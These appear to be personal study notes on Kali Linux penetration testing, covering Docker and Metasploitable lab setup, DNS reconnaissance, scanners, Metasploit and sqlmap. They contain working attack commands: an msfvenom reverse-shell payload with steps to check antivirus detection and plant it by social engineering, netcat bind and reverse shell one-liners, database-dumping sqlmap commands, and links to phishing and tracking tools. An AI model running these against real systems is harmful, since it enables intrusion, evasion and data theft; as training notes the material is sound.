
TOOLS

Kali Linux

DEPENDENCIES

DOCKER

Docker is used for running containers. The image file comes with all dependencies installed,
so there are no errors while running a specific tool.

Installation:

● sudo apt update
● sudo apt upgrade
● sudo apt install apt-transport-https ca-certificates curl software-properties-common
● curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
● sudo apt install -y docker.io
● sudo systemctl status docker
● sudo systemctl enable docker --now
● /* sudo usermod -aG docker $USER
  printf '%s\n' "deb https://download.docker.com/linux/debian bullseye stable" | sudo tee /etc/apt/sources.list.d/docker-ce.list
  curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /etc/apt/trusted.gpg.d/docker-ce-archive-keyring.gpg */
● sudo apt update
● sudo apt install -y docker-ce docker-ce-cli containerd.io
● sudo systemctl start docker
● sudo systemctl enable docker
● sudo docker --version

If you want to use docker next time, first START and ENABLE docker.

METASPLOITABLE

Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to
conduct security training, test security tools, and practice common penetration testing
techniques.

Installation:

● Now, we are going to install this vulnerable machine in DOCKER.
● First start Docker and pull the image - sudo docker pull icarossio/metasploitable2
● Now run the container - docker run -ditP icarossio/metasploitable2
● After running this container, you'll get a container id like this = dee0952648eec8dc51aa9d45c6c0317b84c4ef6c88e50af7e86c834eb5556598
● Now open a shell in this container - docker exec -it <container id> /bin/bash
● That's it! The Metasploitable machine is running.

RECONNAISSANCE
★ NS LOOKUP
★ Sudomy ( subdomain finder )
★ Cupp
★ Httpx
★ Bhedak
★ 403 bypasser
★ uncover
★ https://github.com/mishakorzik/Free-Proxy
★ https://github.com/mishakorzik/UserFinder
★ Host
★ Dig
★ WHOIS
★ FOCA
★ ExifTool
★ theHarvester
★ shodan
★ Maltego
★ recon-ng
★ censys
★ Netcat
★ dnsrecon
★ Sublist3r

DNS ANALYSIS

DNS Analysis is mainly done for getting DNS INFRASTRUCTURE details. Based on these
details, you can create a profile of the victim.

DNSRECON

dnsrecon is a powerful tool used for DNS reconnaissance and enumeration. Its primary
purpose is to gather information about DNS (Domain Name System) records associated
with a particular domain. Here's what dnsrecon is typically used for:

Discovering DNS Records: It scans and enumerates different types of DNS records
associated with a domain, such as SOA, NS, A, AAAA, MX, TXT, and more.

Identifying Name Servers: Finding the authoritative name servers responsible for a
domain.

Enumerating Mail Exchange Servers: Identifying servers responsible for handling
email for the domain.

Record Types: Obtains various types of DNS records associated with the domain, such as
address records, mail exchange records, name server records, and service records.

● It is installed directly from the Kali repositories.
● Start the tool - dnsrecon -h
● For DNS information - dnsrecon -d <h4cker.org>
● Perform a zone transfer - dnsrecon -d <h4cker.org> -z

You'll get name server details, IP addresses and MX records.

FIERCE

● Fierce is also used for the same purpose: getting DNS information.
● fierce --domain <h4cker.org>
● Along with the DNS info, you'll get a subdomain list.

DNSENUM

● This tool does the same job as dnsrecon. You'll get associated IP addresses, subdomains, name servers and so on.
● dnsenum --enum <h4cker.org>

IDS/IPS & WAF identification

Identify whether a website is using load balancers or web application firewalls.

wafw00f

Identify and fingerprint web application firewall products.

● Start the tool - wafw00f -h
● Give your target - wafw00f <http://h4cker.org/>
● You'll get a result saying whether the website uses a WAF or any other security solution.

SCANNING

NESSUS

Nessus is a platform developed by Tenable that scans for security vulnerabilities in
devices, applications, operating systems, cloud services and other network resources.

Installation

● First go to the browser and download the Nessus file manually:
● https://www.tenable.com/downloads/nessus?loginAttempted=true ( or )
● Select DOWNLOAD BY CURL and run that command in the terminal.
● dpkg -i Nessus-10.0.2-ubuntu910_amd64.deb ( replace the file name with the currently downloaded version; use ls to find the file name )
● Start Nessus by typing the following into your terminal:
● /bin/systemctl start nessusd.service
● Navigate to https://kali:8843/ in your browser to start Nessus and configure your scanner.
● Accept the risk, continue, select the education-purpose account type and create an account ( use a disposable work email )
● Now you'll find the GUI version of NESSUS.
● Wait till the compilation of plugins is completed.
● Start NEW SCAN and set the TARGET.
● Wait for the scan to complete, then check the scan results.
● Click on REPORT to generate a scan report.

DIRB

Use this tool for scanning for existing directories on the website.

● Open a terminal and enter = dirb <url>
● It uses a wordlist file: it scans the website for every directory in that list and reports the ones that exist.

NIKTO

For scanning purposes.

● nikto -host <url>

UNISCAN

It is also a scanner, with different features.

● By typing uniscan on its own, we get uniscan's help and can see all the available options:
● -h for help, -u to specify the URL, -f for a list of URLs, -b to send uniscan to the background
● -q enable directory checks, -w enable file checks, -e enable the robots.txt and sitemap.xml check, -t enable dynamic checks, -s enable static checks, -r enable stress checks, -i search in Bing, -o search in Google, -g find out the web fingerprint, -j server fingerprint.
● uniscan -u testphp.vulnweb.com -qwodsrgj

WIRELESS HACKING

SOCIAL ENGINEERING

PASSWORD CRACKING

EXPLOITATION
● Xsser
● Armitage ( Metasploit GUI version )

Creating backdoors/shells

METASPLOIT

Metasploit is one of the most powerful and widely used tools for penetration testing.

Installation

● Run the tool from applications. It is pre-installed.

Basic usage

● Start the tool with msfconsole
● Now you are in the Metasploit console window.
● Metasploit works with modules. It has 7 module types: auxiliary, encoder, evasion, exploit, nop, payload, post. Refer to https://docs.metasploit.com/docs/modules.html
● Search for modules - search <module name>, for example search exploit
● Interact with a module by name or index. For example info 1232, use 1232 or use auxiliary/dos/http/ws_dos
● Now see the options for that module and make your settings - show options
● Depending on the options, set hosts and ports - set rhosts <victim ip address>, set rport <victim port>
● Now deliver the exploit to the victim - exploit

Setting module options

● Each Metasploit module has a set of options which must be set before running. These can be seen with the show options or options command.
● Each Metasploit module also has advanced options, which can often be useful for fine-tuning modules.
● You can see which options still need to be set with the show missing command.

Creating payload

● For creating payloads, we use msfvenom.
● msfvenom -p windows/meterpreter_reverse_http LHOST=<IP> LPORT=4444 -f exe > payload.exe
● The payload is created and the path where it is saved is shown.
● Upload the payload to the VIRUSTOTAL website to check whether it is detected by any anti-virus or not!
● Now, using social engineering techniques, install that payload on the victim device.
● Then connect to that payload with msfconsole. For that, start a multi handler.
● use exploit/multi/handler
● set payload windows/x64/meterpreter/reverse_tcp
● Now send the exploit to the background = exploit -j -z
● Open the app on the victim machine; now you'll get access.
● Type sessions to check your sessions. Use a session with sessions -i <session number>
● https://nptel.ac.in/courses/106105217

NETCAT

Here, we are using NETCAT for creating BIND & REVERSE shells.

BIND SHELL:

● With a bind shell, an attacker opens a port or a listener on the compromised system and waits for a connection. This is done in order to connect to the victim from any system, execute commands and further manipulate the victim.
● Start a listener on the victim machine. Enter this command on the victim machine - nc -lvp 1234 -e /bin/bash
● Now connect to that listener from the attacker machine. Type this command on your machine - nc -nv <victim ip> 1234
● That's it, backdoor created; now you can view files on the victim machine. Type ls to view them.

REVERSE SHELL:

A reverse shell is a technique in which the attacking system has a listener (port open),
and the victim initiates a connection back to the attacking system.

One of the challenges of using bind shells is that if the victim’s system is behind a
firewall, the listening port might be blocked. However, if the victim’s system can
initiate a connection to the attacking system on a given port, a reverse shell can be
used to overcome this challenge.

● Now create a reverse shell. Type this command on the attacker machine - nc -lvp 666
● Now connect to that listener; type this command on the victim system - nc <attacker ip> 666 -e /bin/bash
● Now view files and execute commands.

SQLMAP

SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection.

● Observe a web URL of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where ‘cat=1’ is the ‘GET’ parameter. The website may then be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when the site is PHP based.
● Install sqlmap - sudo apt-get install sqlmap
● Check for help - sqlmap -h
● For sqlmap to work, you should give a URL with input query parameters.
● First, you should get information about the existing databases - sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

--dbs - collect information about the databases

-u - the target URL

● For best results:

1. The GET parameter should be stable.

2. If the GET parameter is dynamic, you'll be asked about a HEURISTIC TEST; go with that.

● List information about the tables present in a particular database - sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D <database name> --tables
● List information about the columns of a particular table - sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D <database name> -T <table name> --columns
● Dump the data from the columns - sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D <database name> -T <table name> -C <column name> --dump
● SQL injection can generally be prevented by using prepared statements. With a prepared statement, we send the SQL query with a placeholder for the user input and then send the actual user input separately.
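As an added illustration of the prepared-statement defence in the last bullet (example code written for this page, not sqlmap's or vulnweb's code): a constructed SQLite catalogue stands in for the database behind listproducts.php, and the ?cat= value is passed once by string concatenation and once as a bound parameter. The table, its rows and the integer-validation helper are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the catalogue behind listproducts.php."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, cat INTEGER);
        INSERT INTO products VALUES (1, 'Bike', 1), (2, 'Helmet', 1), (3, 'Boots', 2);
    """)
    return conn

def list_products_vulnerable(conn, cat):
    """The raw ?cat= value is pasted into the SQL text, so it can rewrite the query."""
    sql = "SELECT name FROM products WHERE cat = " + cat
    return [row[0] for row in conn.execute(sql)]

def list_products_prepared(conn, cat):
    """Prepared statement: the query carries a placeholder and the value is bound
    separately, so the engine never parses the user input as SQL."""
    rows = conn.execute("SELECT name FROM products WHERE cat = ?", (cat,))
    return [row[0] for row in rows]

def list_products_hardened(conn, cat):
    """Extra step not in the notes: also validate the type before the value is bound."""
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError(f"cat must be an integer, got {cat!r}") from None
    return list_products_prepared(conn, cat_id)

if __name__ == "__main__":
    db = make_db()
    tainted = "1 OR 1=1"   # constructed value: the classic tautology that sqlmap's tests probe for
    print("vulnerable:", list_products_vulnerable(db, tainted))   # every product leaks
    print("prepared:  ", list_products_prepared(db, tainted))     # no row has cat '1 OR 1=1'
```

With the bound parameter SQLite compares the whole string against the integer column and simply finds no match, which is exactly why sqlmap's heuristic tests get nothing back from a parameterised page.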

POST-EXPLOITATION

REVERSE ENGINEERING

INTRUSION DETECTION SYSTEMS

REPORTING

MISCELLANEOUS

★ Maxphisher https://github.com/KasRoudra/MaxPhisher
★ Hacking toolkit https://github.com/CodingRanjith/hackingtoolkit
★ Evil limiter https://github.com/bitbrute/evillimiter
★ Iky https://github.com/kennbroorg/iKy
★ Cupp https://github.com/Mebus/cupp
★ DDoS attack
★ GITTOOL
★ Xerosploit
★ Rapidscan
★ Seeker (https://medium.com/@aalam-info-solutions-llp/get-someones-location-by-using-seeker-3160b8887e5)
★ Subjack, subfinder
★ https://github.com/kancotdiq/wpaf

Hacking with PDF

https://0xcybery.github.io/blog/hacking-with-pdf
